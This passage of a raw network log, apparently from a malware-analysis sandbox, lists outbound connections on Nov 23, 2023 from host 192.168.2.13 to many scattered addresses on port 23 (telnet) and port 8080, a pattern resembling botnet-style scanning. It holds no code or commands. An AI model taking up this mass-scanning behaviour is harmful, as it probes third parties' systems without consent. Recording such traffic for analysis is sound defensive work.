                                              Nov 23, 2023 05:14:50.604010105 CET5573823192.168.2.13210.218.167.106
                                              Nov 23, 2023 05:14:50.604010105 CET5573823192.168.2.1379.53.78.124
                                              Nov 23, 2023 05:14:50.604032040 CET5573823192.168.2.13220.12.45.146
                                              Nov 23, 2023 05:14:50.604038000 CET5573823192.168.2.1314.80.23.60
                                              Nov 23, 2023 05:14:50.604047060 CET5573823192.168.2.1366.148.85.65
                                              Nov 23, 2023 05:14:50.604058981 CET5573823192.168.2.13138.203.219.155
                                              Nov 23, 2023 05:14:50.604068995 CET5573823192.168.2.13207.204.148.86
                                              Nov 23, 2023 05:14:50.604072094 CET5573823192.168.2.1343.88.196.67
                                              Nov 23, 2023 05:14:50.604080915 CET5573823192.168.2.131.47.77.224
                                              Nov 23, 2023 05:14:50.604094028 CET5573823192.168.2.13125.33.168.135
                                              Nov 23, 2023 05:14:50.604098082 CET5573823192.168.2.1391.2.224.141
                                              Nov 23, 2023 05:14:50.604114056 CET5573823192.168.2.13209.48.10.204
                                              Nov 23, 2023 05:14:50.604119062 CET5573823192.168.2.1327.198.140.213
                                              Nov 23, 2023 05:14:50.604121923 CET5573823192.168.2.13180.38.186.202
                                              Nov 23, 2023 05:14:50.604136944 CET5573823192.168.2.1365.55.252.216
                                              Nov 23, 2023 05:14:50.604141951 CET5573823192.168.2.1366.97.137.40
                                              Nov 23, 2023 05:14:50.604145050 CET5573823192.168.2.13185.203.190.70
                                              Nov 23, 2023 05:14:50.604147911 CET5573823192.168.2.13172.196.122.3
                                              Nov 23, 2023 05:14:50.604161978 CET5573823192.168.2.1380.95.122.171
                                              Nov 23, 2023 05:14:50.604165077 CET5573823192.168.2.1362.129.147.12
                                              Nov 23, 2023 05:14:50.604167938 CET5573823192.168.2.1341.221.241.35
                                              Nov 23, 2023 05:14:50.604181051 CET5573823192.168.2.13250.236.248.161
                                              Nov 23, 2023 05:14:50.604183912 CET5573823192.168.2.13219.148.20.18
                                              Nov 23, 2023 05:14:50.604198933 CET5573823192.168.2.13154.47.212.212
                                              Nov 23, 2023 05:14:50.604208946 CET5573823192.168.2.13113.191.40.238
                                              Nov 23, 2023 05:14:50.604212999 CET5573823192.168.2.13189.171.43.127
                                              Nov 23, 2023 05:14:50.604213953 CET5573823192.168.2.13122.9.168.14
                                              Nov 23, 2023 05:14:50.604228973 CET5573823192.168.2.13126.110.202.145
                                              Nov 23, 2023 05:14:50.604233980 CET5573823192.168.2.1388.190.233.188
                                              Nov 23, 2023 05:14:50.604234934 CET5573823192.168.2.1346.171.145.89
                                              Nov 23, 2023 05:14:50.604244947 CET5573823192.168.2.13182.149.114.66
                                              Nov 23, 2023 05:14:50.604262114 CET5573823192.168.2.13151.20.76.228
                                              Nov 23, 2023 05:14:50.604265928 CET5573823192.168.2.1388.243.111.188
                                              Nov 23, 2023 05:14:50.604266882 CET5573823192.168.2.13211.76.113.205
                                              Nov 23, 2023 05:14:50.604281902 CET5573823192.168.2.13210.142.9.90
                                              Nov 23, 2023 05:14:50.604296923 CET5573823192.168.2.13169.230.123.76
                                              Nov 23, 2023 05:14:50.604302883 CET5573823192.168.2.1370.212.109.83
                                              Nov 23, 2023 05:14:50.604311943 CET5573823192.168.2.13221.143.153.22
                                              Nov 23, 2023 05:14:50.604311943 CET5573823192.168.2.13202.88.103.125
                                              Nov 23, 2023 05:14:50.604329109 CET5573823192.168.2.1348.83.204.61
                                              Nov 23, 2023 05:14:50.604338884 CET5573823192.168.2.13197.23.205.119
                                              Nov 23, 2023 05:14:50.604342937 CET5573823192.168.2.13109.155.84.168
                                              Nov 23, 2023 05:14:50.604347944 CET5573823192.168.2.1397.205.187.79
                                              Nov 23, 2023 05:14:50.604355097 CET5573823192.168.2.1389.223.122.68
                                              Nov 23, 2023 05:14:50.604362011 CET5573823192.168.2.13115.223.92.57
                                              Nov 23, 2023 05:14:50.604367971 CET5573823192.168.2.1342.157.100.46
                                              Nov 23, 2023 05:14:50.604371071 CET5573823192.168.2.1397.233.185.183
                                              Nov 23, 2023 05:14:50.604391098 CET5573823192.168.2.132.236.162.169
                                              Nov 23, 2023 05:14:50.604392052 CET5573823192.168.2.13179.124.171.177
                                              Nov 23, 2023 05:14:50.604397058 CET5573823192.168.2.13146.139.169.153
                                              Nov 23, 2023 05:14:50.604403973 CET5573823192.168.2.13196.127.70.177
                                              Nov 23, 2023 05:14:50.604412079 CET5573823192.168.2.13171.237.12.126
                                              Nov 23, 2023 05:14:50.604420900 CET5573823192.168.2.13249.133.215.33
                                              Nov 23, 2023 05:14:50.604428053 CET5573823192.168.2.13211.135.10.166
                                              Nov 23, 2023 05:14:50.604439020 CET5573823192.168.2.1390.19.231.121
                                              Nov 23, 2023 05:14:50.604439020 CET5573823192.168.2.13169.146.164.201
                                              Nov 23, 2023 05:14:50.604454041 CET5573823192.168.2.13208.150.66.225
                                              Nov 23, 2023 05:14:50.604454041 CET5573823192.168.2.13139.28.34.34
                                              Nov 23, 2023 05:14:50.604464054 CET5573823192.168.2.13151.77.77.69
                                              Nov 23, 2023 05:14:50.604477882 CET5573823192.168.2.13109.51.204.79
                                              Nov 23, 2023 05:14:50.604484081 CET5573823192.168.2.13249.25.26.220
                                              Nov 23, 2023 05:14:50.604485035 CET5573823192.168.2.13165.74.225.13
                                              Nov 23, 2023 05:14:50.604510069 CET5573823192.168.2.13251.70.176.144
                                              Nov 23, 2023 05:14:50.604510069 CET5573823192.168.2.1373.85.86.9
                                              Nov 23, 2023 05:14:50.604510069 CET5573823192.168.2.13164.25.251.168
                                              Nov 23, 2023 05:14:50.604526043 CET5573823192.168.2.13242.206.172.212
                                              Nov 23, 2023 05:14:50.604526043 CET5573823192.168.2.1399.36.193.217
                                              Nov 23, 2023 05:14:50.604526043 CET5573823192.168.2.13242.10.92.223
                                              Nov 23, 2023 05:14:50.604541063 CET5573823192.168.2.1336.96.203.33
                                              Nov 23, 2023 05:14:50.604556084 CET5573823192.168.2.13179.96.78.182
                                              Nov 23, 2023 05:14:50.604556084 CET5573823192.168.2.1368.226.109.22
                                              Nov 23, 2023 05:14:50.604556084 CET5573823192.168.2.13216.89.243.114
                                              Nov 23, 2023 05:14:50.604572058 CET5573823192.168.2.1362.185.251.183
                                              Nov 23, 2023 05:14:50.604574919 CET5573823192.168.2.13200.58.154.150
                                              Nov 23, 2023 05:14:50.604584932 CET5573823192.168.2.1359.118.242.218
                                              Nov 23, 2023 05:14:50.604595900 CET5573823192.168.2.13109.164.174.127
                                              Nov 23, 2023 05:14:50.604595900 CET5573823192.168.2.13244.33.45.71
                                              Nov 23, 2023 05:14:50.604599953 CET5573823192.168.2.13191.231.91.34
                                              Nov 23, 2023 05:14:50.604614973 CET5573823192.168.2.13121.252.215.24
                                              Nov 23, 2023 05:14:50.604619026 CET5573823192.168.2.13246.211.69.40
                                              Nov 23, 2023 05:14:50.604626894 CET5573823192.168.2.1318.58.47.99
                                              Nov 23, 2023 05:14:50.604629040 CET5573823192.168.2.13189.6.138.69
                                              Nov 23, 2023 05:14:50.604645014 CET5573823192.168.2.13167.219.250.140
                                              Nov 23, 2023 05:14:50.604651928 CET5573823192.168.2.1317.78.46.215
                                              Nov 23, 2023 05:14:50.604665995 CET5573823192.168.2.1337.33.88.75
                                              Nov 23, 2023 05:14:50.604691029 CET5573823192.168.2.13119.30.106.6
                                              Nov 23, 2023 05:14:50.604691029 CET5573823192.168.2.1318.149.133.122
                                              Nov 23, 2023 05:14:50.604706049 CET5573823192.168.2.1337.131.125.24
                                              Nov 23, 2023 05:14:50.604707956 CET5573823192.168.2.1348.188.13.102
                                              Nov 23, 2023 05:14:50.604721069 CET5573823192.168.2.13176.7.225.111
                                              Nov 23, 2023 05:14:50.604724884 CET5573823192.168.2.13152.148.135.22
                                              Nov 23, 2023 05:14:50.604732990 CET5573823192.168.2.13194.205.186.35
                                              Nov 23, 2023 05:14:50.604741096 CET5573823192.168.2.1397.230.193.209
                                              Nov 23, 2023 05:14:50.604748011 CET5573823192.168.2.13204.159.32.179
                                              Nov 23, 2023 05:14:50.604759932 CET5573823192.168.2.1389.4.13.210
                                              Nov 23, 2023 05:14:50.604763985 CET5573823192.168.2.1340.219.223.47
                                              Nov 23, 2023 05:14:50.604768991 CET5573823192.168.2.13251.90.165.145
                                              Nov 23, 2023 05:14:50.604779005 CET5573823192.168.2.1362.189.163.111
                                              Nov 23, 2023 05:14:50.604784012 CET5573823192.168.2.13124.116.20.122
                                              Nov 23, 2023 05:14:50.604790926 CET5573823192.168.2.13153.145.253.23
                                              Nov 23, 2023 05:14:50.604798079 CET5573823192.168.2.13169.230.220.170
                                              Nov 23, 2023 05:14:50.604801893 CET5573823192.168.2.1379.71.255.13
                                              Nov 23, 2023 05:14:50.604808092 CET5573823192.168.2.13175.79.17.180
                                              Nov 23, 2023 05:14:50.604815960 CET5573823192.168.2.1375.109.75.164
                                              Nov 23, 2023 05:14:50.604826927 CET5573823192.168.2.13119.123.147.171
                                              Nov 23, 2023 05:14:50.604855061 CET5573823192.168.2.13160.61.47.110
                                              Nov 23, 2023 05:14:50.604861975 CET5573823192.168.2.13173.247.179.174
                                              Nov 23, 2023 05:14:50.604862928 CET5573823192.168.2.13181.43.158.161
                                              Nov 23, 2023 05:14:50.604876995 CET5573823192.168.2.1342.68.235.114
                                              Nov 23, 2023 05:14:50.604882002 CET5573823192.168.2.13217.165.195.202
                                              Nov 23, 2023 05:14:50.604887009 CET5573823192.168.2.1390.252.41.184
                                              Nov 23, 2023 05:14:50.604887009 CET5573823192.168.2.13112.204.17.117
                                              Nov 23, 2023 05:14:50.604897976 CET5573823192.168.2.13150.191.66.118
                                              Nov 23, 2023 05:14:50.604897976 CET5573823192.168.2.13124.60.50.72
                                              Nov 23, 2023 05:14:50.604901075 CET5573823192.168.2.13115.139.164.88
                                              Nov 23, 2023 05:14:50.604909897 CET5573823192.168.2.1338.61.221.234
                                              Nov 23, 2023 05:14:50.604921103 CET5573823192.168.2.13154.79.57.100
                                              Nov 23, 2023 05:14:50.604923010 CET5573823192.168.2.13196.209.246.253
                                              Nov 23, 2023 05:14:50.604937077 CET5573823192.168.2.1374.103.109.158
                                              Nov 23, 2023 05:14:50.604939938 CET5573823192.168.2.13176.220.142.33
                                              Nov 23, 2023 05:14:50.604939938 CET5573823192.168.2.1361.226.154.153
                                              Nov 23, 2023 05:14:50.604952097 CET5573823192.168.2.13222.95.210.84
                                              Nov 23, 2023 05:14:50.604962111 CET5573823192.168.2.13102.123.77.171
                                              Nov 23, 2023 05:14:50.604962111 CET5573823192.168.2.1383.74.123.29
                                              Nov 23, 2023 05:14:50.604974985 CET5573823192.168.2.1359.218.48.127
                                              Nov 23, 2023 05:14:50.604979992 CET5573823192.168.2.1318.122.136.237
                                              Nov 23, 2023 05:14:50.604986906 CET5573823192.168.2.13252.169.254.155
                                              Nov 23, 2023 05:14:50.604988098 CET5573823192.168.2.13108.36.86.43
                                              Nov 23, 2023 05:14:50.604996920 CET5573823192.168.2.13222.138.11.21
                                              Nov 23, 2023 05:14:50.605004072 CET5573823192.168.2.13114.188.244.14
                                              Nov 23, 2023 05:14:50.605012894 CET5573823192.168.2.1346.73.4.159
                                              Nov 23, 2023 05:14:50.605030060 CET5573823192.168.2.1360.49.2.148
                                              Nov 23, 2023 05:14:50.605034113 CET5573823192.168.2.13194.235.176.101
                                              Nov 23, 2023 05:14:50.605041027 CET5573823192.168.2.13185.24.245.116
                                              Nov 23, 2023 05:14:50.605050087 CET5573823192.168.2.1345.54.190.131
                                              Nov 23, 2023 05:14:50.605061054 CET5573823192.168.2.13217.133.16.54
                                              Nov 23, 2023 05:14:50.605065107 CET5573823192.168.2.1373.147.231.235
                                              Nov 23, 2023 05:14:50.605073929 CET5573823192.168.2.13209.193.127.176
                                              Nov 23, 2023 05:14:50.605082989 CET5573823192.168.2.13113.120.65.97
                                              Nov 23, 2023 05:14:50.605089903 CET5573823192.168.2.13123.114.58.227
                                              Nov 23, 2023 05:14:50.605098009 CET5573823192.168.2.132.99.21.138
                                              Nov 23, 2023 05:14:50.605113029 CET5573823192.168.2.1377.54.23.163
                                              Nov 23, 2023 05:14:50.605120897 CET5573823192.168.2.1368.231.195.181
                                              Nov 23, 2023 05:14:50.605132103 CET5573823192.168.2.1380.82.36.247
                                              Nov 23, 2023 05:14:50.605134964 CET5573823192.168.2.1377.157.9.18
                                              Nov 23, 2023 05:14:50.605144024 CET5573823192.168.2.13218.194.184.47
                                              Nov 23, 2023 05:14:50.605144978 CET5573823192.168.2.1342.188.250.221
                                              Nov 23, 2023 05:14:50.605145931 CET5573823192.168.2.13185.8.160.59
                                              Nov 23, 2023 05:14:50.605169058 CET5573823192.168.2.13189.41.70.184
                                              Nov 23, 2023 05:14:50.605169058 CET5573823192.168.2.1336.86.29.114
                                              Nov 23, 2023 05:14:50.605170965 CET5573823192.168.2.1323.39.197.95
                                              Nov 23, 2023 05:14:50.605170965 CET5573823192.168.2.13176.246.33.200
                                              Nov 23, 2023 05:14:50.605171919 CET5573823192.168.2.13168.201.151.229
                                              Nov 23, 2023 05:14:50.605189085 CET5573823192.168.2.13109.118.166.116
                                              Nov 23, 2023 05:14:50.605196953 CET5573823192.168.2.13218.174.47.39
                                              Nov 23, 2023 05:14:50.605202913 CET5573823192.168.2.13248.235.45.85
                                              Nov 23, 2023 05:14:50.605206013 CET5573823192.168.2.13193.32.99.87
                                              Nov 23, 2023 05:14:50.605232000 CET5573823192.168.2.13168.182.78.248
                                              Nov 23, 2023 05:14:50.605232000 CET5573823192.168.2.1378.147.233.187
                                              Nov 23, 2023 05:14:50.605236053 CET5573823192.168.2.1342.1.15.175
                                              Nov 23, 2023 05:14:50.605236053 CET5573823192.168.2.1337.16.46.128
                                              Nov 23, 2023 05:14:50.605249882 CET5573823192.168.2.13250.2.182.83
                                              Nov 23, 2023 05:14:50.605252028 CET5573823192.168.2.13164.87.214.14
                                              Nov 23, 2023 05:14:50.605262995 CET5573823192.168.2.1347.95.255.61
                                              Nov 23, 2023 05:14:50.605287075 CET5573823192.168.2.1313.202.101.117
                                              Nov 23, 2023 05:14:50.605288029 CET5573823192.168.2.13141.10.136.38
                                              Nov 23, 2023 05:14:50.605290890 CET5573823192.168.2.1318.207.206.175
                                              Nov 23, 2023 05:14:50.605314970 CET5573823192.168.2.1346.156.157.138
                                              Nov 23, 2023 05:14:50.605315924 CET5573823192.168.2.13142.15.156.178
                                              Nov 23, 2023 05:14:50.605315924 CET5573823192.168.2.13213.2.141.64
                                              Nov 23, 2023 05:14:50.605330944 CET5573823192.168.2.1324.43.62.26
                                              Nov 23, 2023 05:14:50.605345011 CET5573823192.168.2.13114.9.92.120
                                              Nov 23, 2023 05:14:50.605345964 CET5573823192.168.2.13170.40.192.243
                                              Nov 23, 2023 05:14:50.605354071 CET5573823192.168.2.1394.190.137.231
                                              Nov 23, 2023 05:14:50.605364084 CET5573823192.168.2.13247.28.190.45
                                              Nov 23, 2023 05:14:50.605377913 CET5573823192.168.2.1391.6.135.234
                                              Nov 23, 2023 05:14:50.605381966 CET5573823192.168.2.1361.141.15.78
                                              Nov 23, 2023 05:14:50.605385065 CET5573823192.168.2.13160.42.90.201
                                              Nov 23, 2023 05:14:50.605385065 CET5573823192.168.2.13245.178.172.180
                                              Nov 23, 2023 05:14:50.605393887 CET5573823192.168.2.13176.72.119.6
                                              Nov 23, 2023 05:14:50.605410099 CET5573823192.168.2.1347.9.44.134
                                              Nov 23, 2023 05:14:50.605412960 CET5573823192.168.2.13218.147.196.20
                                              Nov 23, 2023 05:14:50.605426073 CET5573823192.168.2.13182.249.196.50
                                              Nov 23, 2023 05:14:50.605426073 CET5573823192.168.2.1387.226.220.182
                                              Nov 23, 2023 05:14:50.605437994 CET5573823192.168.2.1389.9.53.205
                                              Nov 23, 2023 05:14:50.605438948 CET5573823192.168.2.13192.80.66.233
                                              Nov 23, 2023 05:14:50.605448008 CET5573823192.168.2.1387.16.37.58
                                              Nov 23, 2023 05:14:50.605457067 CET5573823192.168.2.13138.237.43.151
                                              Nov 23, 2023 05:14:50.605464935 CET5573823192.168.2.1339.5.85.232
                                              Nov 23, 2023 05:14:50.605478048 CET5573823192.168.2.1348.210.119.191
                                              Nov 23, 2023 05:14:50.605478048 CET5573823192.168.2.1348.204.20.218
                                              Nov 23, 2023 05:14:50.605485916 CET5573823192.168.2.13157.158.206.44
                                              Nov 23, 2023 05:14:50.605485916 CET5573823192.168.2.1396.109.151.178
                                              Nov 23, 2023 05:14:50.605488062 CET5573823192.168.2.13168.129.194.142
                                              Nov 23, 2023 05:14:50.605499983 CET5573823192.168.2.13160.71.146.135
                                              Nov 23, 2023 05:14:50.605499983 CET5573823192.168.2.13147.22.132.234
                                              Nov 23, 2023 05:14:50.605521917 CET5573823192.168.2.13152.246.174.45
                                              Nov 23, 2023 05:14:50.605523109 CET5573823192.168.2.13155.212.216.144
                                              Nov 23, 2023 05:14:50.605523109 CET5573823192.168.2.13223.57.248.221
                                              Nov 23, 2023 05:14:50.605530024 CET5573823192.168.2.1345.16.62.131
                                              Nov 23, 2023 05:14:50.605535030 CET5573823192.168.2.13202.101.103.230
                                              Nov 23, 2023 05:14:50.605551004 CET5573823192.168.2.1335.107.33.173
                                              Nov 23, 2023 05:14:50.605556965 CET5573823192.168.2.13154.95.17.110
                                              Nov 23, 2023 05:14:50.605568886 CET5573823192.168.2.13242.253.44.123
                                              Nov 23, 2023 05:14:50.605573893 CET5573823192.168.2.1357.60.146.5
                                              Nov 23, 2023 05:14:50.605587959 CET5573823192.168.2.13243.189.202.252
                                              Nov 23, 2023 05:14:50.605597019 CET5573823192.168.2.13211.77.207.29
                                              Nov 23, 2023 05:14:50.605612993 CET5573823192.168.2.13253.117.114.2
                                              Nov 23, 2023 05:14:50.605632067 CET5573823192.168.2.1339.144.129.18
                                              Nov 23, 2023 05:14:50.605634928 CET5573823192.168.2.13192.71.144.10
                                              Nov 23, 2023 05:14:50.605647087 CET5573823192.168.2.13150.198.44.92
                                              Nov 23, 2023 05:14:50.629121065 CET542028080192.168.2.1362.241.34.95
                                              Nov 23, 2023 05:14:50.629125118 CET542028080192.168.2.1394.218.210.254
                                              Nov 23, 2023 05:14:50.629148960 CET542028080192.168.2.1394.191.35.144
                                              Nov 23, 2023 05:14:50.629149914 CET542028080192.168.2.1395.20.29.70
                                              Nov 23, 2023 05:14:50.629158974 CET542028080192.168.2.1394.99.162.161
                                              Nov 23, 2023 05:14:50.629158974 CET542028080192.168.2.1331.125.43.199
                                              Nov 23, 2023 05:14:50.629158974 CET542028080192.168.2.1395.236.52.153
                                              Nov 23, 2023 05:14:50.629162073 CET542028080192.168.2.1362.195.196.245
                                              Nov 23, 2023 05:14:50.629162073 CET542028080192.168.2.1395.180.38.184
                                              Nov 23, 2023 05:14:50.629162073 CET542028080192.168.2.1394.128.31.35
                                              Nov 23, 2023 05:14:50.629162073 CET542028080192.168.2.1362.64.220.227
                                              Nov 23, 2023 05:14:50.629175901 CET542028080192.168.2.1385.206.136.251
                                              Nov 23, 2023 05:14:50.629182100 CET542028080192.168.2.1385.62.146.189
                                              Nov 23, 2023 05:14:50.629185915 CET542028080192.168.2.1395.147.17.7
                                              Nov 23, 2023 05:14:50.629189968 CET542028080192.168.2.1331.211.252.86
                                              Nov 23, 2023 05:14:50.629204988 CET542028080192.168.2.1395.181.247.21
                                              Nov 23, 2023 05:14:50.629204988 CET542028080192.168.2.1362.166.181.91
                                              Nov 23, 2023 05:14:50.629208088 CET542028080192.168.2.1394.78.40.247
                                              Nov 23, 2023 05:14:50.629211903 CET542028080192.168.2.1385.127.134.202
                                              Nov 23, 2023 05:14:50.629221916 CET542028080192.168.2.1394.255.111.223
                                              Nov 23, 2023 05:14:50.629234076 CET542028080192.168.2.1331.44.113.208
                                              Nov 23, 2023 05:14:50.629234076 CET542028080192.168.2.1331.193.113.240
                                              Nov 23, 2023 05:14:50.629234076 CET542028080192.168.2.1394.26.217.39
                                              Nov 23, 2023 05:14:50.629251957 CET542028080192.168.2.1394.21.107.69
                                              Nov 23, 2023 05:14:50.629255056 CET542028080192.168.2.1394.159.126.157
                                              Nov 23, 2023 05:14:50.629268885 CET542028080192.168.2.1394.150.133.116
                                              Nov 23, 2023 05:14:50.629270077 CET542028080192.168.2.1394.55.245.189
                                              Nov 23, 2023 05:14:50.629270077 CET542028080192.168.2.1385.69.27.156
                                              Nov 23, 2023 05:14:50.629277945 CET542028080192.168.2.1395.202.65.151
                                              Nov 23, 2023 05:14:50.629287958 CET542028080192.168.2.1362.108.110.157
                                              Nov 23, 2023 05:14:50.629302025 CET542028080192.168.2.1362.44.213.92
                                              Nov 23, 2023 05:14:50.629302025 CET542028080192.168.2.1385.139.84.106
                                              Nov 23, 2023 05:14:50.629312992 CET542028080192.168.2.1385.202.128.169
                                              Nov 23, 2023 05:14:50.629328012 CET542028080192.168.2.1395.173.167.192
                                              Nov 23, 2023 05:14:50.629343987 CET542028080192.168.2.1385.127.116.45
                                              Nov 23, 2023 05:14:50.629348040 CET542028080192.168.2.1385.16.179.166
                                              Nov 23, 2023 05:14:50.629357100 CET542028080192.168.2.1362.124.15.255
                                              Nov 23, 2023 05:14:50.629362106 CET542028080192.168.2.1331.189.221.167
                                              Nov 23, 2023 05:14:50.629369020 CET542028080192.168.2.1362.119.108.18
                                              Nov 23, 2023 05:14:50.629383087 CET542028080192.168.2.1331.162.107.194
                                              Nov 23, 2023 05:14:50.629384995 CET542028080192.168.2.1385.202.169.239
                                              Nov 23, 2023 05:14:50.629384995 CET542028080192.168.2.1385.75.140.135
                                              Nov 23, 2023 05:14:50.629404068 CET542028080192.168.2.1395.185.250.202
                                              Nov 23, 2023 05:14:50.629430056 CET542028080192.168.2.1395.114.137.23
                                              Nov 23, 2023 05:14:50.629430056 CET542028080192.168.2.1331.227.250.183
                                              Nov 23, 2023 05:14:50.629439116 CET542028080192.168.2.1394.130.59.68
                                              Nov 23, 2023 05:14:50.629441023 CET542028080192.168.2.1362.243.144.253
                                              Nov 23, 2023 05:14:50.629441977 CET542028080192.168.2.1331.223.15.206
                                              Nov 23, 2023 05:14:50.629460096 CET542028080192.168.2.1385.111.141.13
                                              Nov 23, 2023 05:14:50.629461050 CET542028080192.168.2.1394.54.148.97
                                              Nov 23, 2023 05:14:50.629465103 CET542028080192.168.2.1362.162.18.90
                                              Nov 23, 2023 05:14:50.629467964 CET542028080192.168.2.1385.220.10.159
                                              Nov 23, 2023 05:14:50.629481077 CET542028080192.168.2.1362.51.91.197
                                              Nov 23, 2023 05:14:50.629491091 CET542028080192.168.2.1395.247.155.131
                                              Nov 23, 2023 05:14:50.629491091 CET542028080192.168.2.1385.43.155.73
                                              Nov 23, 2023 05:14:50.629491091 CET542028080192.168.2.1362.211.227.214
                                              Nov 23, 2023 05:14:50.629501104 CET542028080192.168.2.1395.232.247.202
                                              Nov 23, 2023 05:14:50.629508972 CET542028080192.168.2.1394.80.71.106
                                              Nov 23, 2023 05:14:50.629514933 CET542028080192.168.2.1385.200.145.68
                                              Nov 23, 2023 05:14:50.629528999 CET542028080192.168.2.1395.173.155.18
                                              Nov 23, 2023 05:14:50.629528999 CET542028080192.168.2.1331.68.162.142
                                              Nov 23, 2023 05:14:50.629534006 CET542028080192.168.2.1394.48.198.64
                                              Nov 23, 2023 05:14:50.629544973 CET542028080192.168.2.1331.69.5.78
                                              Nov 23, 2023 05:14:50.629548073 CET542028080192.168.2.1395.252.174.72
                                              Nov 23, 2023 05:14:50.629553080 CET542028080192.168.2.1394.201.250.12
                                              Nov 23, 2023 05:14:50.629565001 CET542028080192.168.2.1395.169.105.38
                                              Nov 23, 2023 05:14:50.629570007 CET542028080192.168.2.1331.122.56.254
                                              Nov 23, 2023 05:14:50.629585028 CET542028080192.168.2.1395.120.105.38
                                              Nov 23, 2023 05:14:50.629587889 CET542028080192.168.2.1394.156.250.251
                                              Nov 23, 2023 05:14:50.629606962 CET542028080192.168.2.1395.42.63.28
                                              Nov 23, 2023 05:14:50.629607916 CET542028080192.168.2.1394.83.110.177
                                              Nov 23, 2023 05:14:50.629607916 CET542028080192.168.2.1394.57.199.192
                                              Nov 23, 2023 05:14:50.629614115 CET542028080192.168.2.1331.241.86.124
                                              Nov 23, 2023 05:14:50.629626036 CET542028080192.168.2.1331.216.132.239
                                              Nov 23, 2023 05:14:50.629638910 CET542028080192.168.2.1331.175.143.122
                                              Nov 23, 2023 05:14:50.629640102 CET542028080192.168.2.1394.137.168.5
                                              Nov 23, 2023 05:14:50.629640102 CET542028080192.168.2.1385.119.141.217
                                              Nov 23, 2023 05:14:50.629642010 CET542028080192.168.2.1362.226.74.77
                                              Nov 23, 2023 05:14:50.629643917 CET542028080192.168.2.1331.20.118.149
                                              Nov 23, 2023 05:14:50.629647017 CET542028080192.168.2.1331.130.53.23
                                              Nov 23, 2023 05:14:50.629664898 CET542028080192.168.2.1385.123.30.238
                                              Nov 23, 2023 05:14:50.629667044 CET542028080192.168.2.1395.200.173.140
                                              Nov 23, 2023 05:14:50.629671097 CET542028080192.168.2.1362.66.139.192
                                              Nov 23, 2023 05:14:50.629687071 CET542028080192.168.2.1385.198.230.174
                                              Nov 23, 2023 05:14:50.629688978 CET542028080192.168.2.1385.167.61.91
                                              Nov 23, 2023 05:14:50.629698992 CET542028080192.168.2.1331.236.194.234
                                              Nov 23, 2023 05:14:50.629704952 CET542028080192.168.2.1395.255.142.133
                                              Nov 23, 2023 05:14:50.629704952 CET542028080192.168.2.1331.175.106.114
                                              Nov 23, 2023 05:14:50.629718065 CET542028080192.168.2.1362.95.229.126
                                              Nov 23, 2023 05:14:50.629718065 CET542028080192.168.2.1395.145.248.186
                                              Nov 23, 2023 05:14:50.629720926 CET542028080192.168.2.1394.181.141.117
                                              Nov 23, 2023 05:14:50.629726887 CET542028080192.168.2.1331.136.127.219
                                              Nov 23, 2023 05:14:50.629729033 CET542028080192.168.2.1395.242.144.3
                                              Nov 23, 2023 05:14:50.629731894 CET542028080192.168.2.1385.100.101.253
                                              Nov 23, 2023 05:14:50.629745007 CET542028080192.168.2.1394.27.105.141
                                              Nov 23, 2023 05:14:50.629755020 CET542028080192.168.2.1362.230.117.126
                                              Nov 23, 2023 05:14:50.629765987 CET542028080192.168.2.1385.147.51.173
                                              Nov 23, 2023 05:14:50.629765987 CET542028080192.168.2.1385.49.199.233
                                              Nov 23, 2023 05:14:50.629779100 CET542028080192.168.2.1362.211.68.188
                                              Nov 23, 2023 05:14:50.629782915 CET542028080192.168.2.1394.73.82.166
                                              Nov 23, 2023 05:14:50.629785061 CET542028080192.168.2.1362.232.122.120
                                              Nov 23, 2023 05:14:50.629785061 CET542028080192.168.2.1362.150.33.76
                                              Nov 23, 2023 05:14:50.629786968 CET542028080192.168.2.1385.17.113.114
                                              Nov 23, 2023 05:14:50.629801989 CET542028080192.168.2.1331.45.255.95
                                              Nov 23, 2023 05:14:50.629806042 CET542028080192.168.2.1395.83.5.112
                                              Nov 23, 2023 05:14:50.629810095 CET542028080192.168.2.1395.92.213.15
                                              Nov 23, 2023 05:14:50.629822969 CET542028080192.168.2.1331.11.238.54
                                              Nov 23, 2023 05:14:50.629822969 CET542028080192.168.2.1331.216.203.86
                                              Nov 23, 2023 05:14:50.629823923 CET542028080192.168.2.1394.178.244.195
                                              Nov 23, 2023 05:14:50.629841089 CET542028080192.168.2.1394.60.219.183
                                              Nov 23, 2023 05:14:50.629841089 CET542028080192.168.2.1331.108.72.11
                                              Nov 23, 2023 05:14:50.629844904 CET542028080192.168.2.1331.123.83.209
                                              Nov 23, 2023 05:14:50.629848957 CET542028080192.168.2.1385.183.194.55
                                              Nov 23, 2023 05:14:50.629854918 CET542028080192.168.2.1362.161.72.30
                                              Nov 23, 2023 05:14:50.629864931 CET542028080192.168.2.1395.191.0.52
                                              Nov 23, 2023 05:14:50.629864931 CET542028080192.168.2.1395.73.80.235
                                              Nov 23, 2023 05:14:50.629878998 CET542028080192.168.2.1362.217.237.182
                                              Nov 23, 2023 05:14:50.629880905 CET542028080192.168.2.1395.215.177.75
                                              Nov 23, 2023 05:14:50.629882097 CET542028080192.168.2.1331.35.121.44
                                              Nov 23, 2023 05:14:50.629899979 CET542028080192.168.2.1362.40.131.196
                                              Nov 23, 2023 05:14:50.629899979 CET542028080192.168.2.1385.190.75.184
                                              Nov 23, 2023 05:14:50.629901886 CET542028080192.168.2.1362.16.223.183
                                              Nov 23, 2023 05:14:50.629901886 CET542028080192.168.2.1385.119.123.185
                                              Nov 23, 2023 05:14:50.629910946 CET542028080192.168.2.1331.63.201.28
                                              Nov 23, 2023 05:14:50.629926920 CET542028080192.168.2.1394.193.92.121
                                              Nov 23, 2023 05:14:50.629926920 CET542028080192.168.2.1362.18.200.52
                                              Nov 23, 2023 05:14:50.629941940 CET542028080192.168.2.1395.211.152.221
                                              Nov 23, 2023 05:14:50.629945040 CET542028080192.168.2.1362.177.226.89
                                              Nov 23, 2023 05:14:50.629951954 CET542028080192.168.2.1395.138.160.49
                                              Nov 23, 2023 05:14:50.629959106 CET542028080192.168.2.1385.108.85.103
                                              Nov 23, 2023 05:14:50.629976034 CET542028080192.168.2.1331.148.126.127
                                              Nov 23, 2023 05:14:50.629980087 CET542028080192.168.2.1394.158.200.174
                                              Nov 23, 2023 05:14:50.629980087 CET542028080192.168.2.1394.158.131.184
                                              Nov 23, 2023 05:14:50.629982948 CET542028080192.168.2.1385.190.195.2
                                              Nov 23, 2023 05:14:50.629997015 CET542028080192.168.2.1385.127.79.73
                                              Nov 23, 2023 05:14:50.629997015 CET542028080192.168.2.1362.153.141.88
                                              Nov 23, 2023 05:14:50.629997015 CET542028080192.168.2.1385.11.126.27
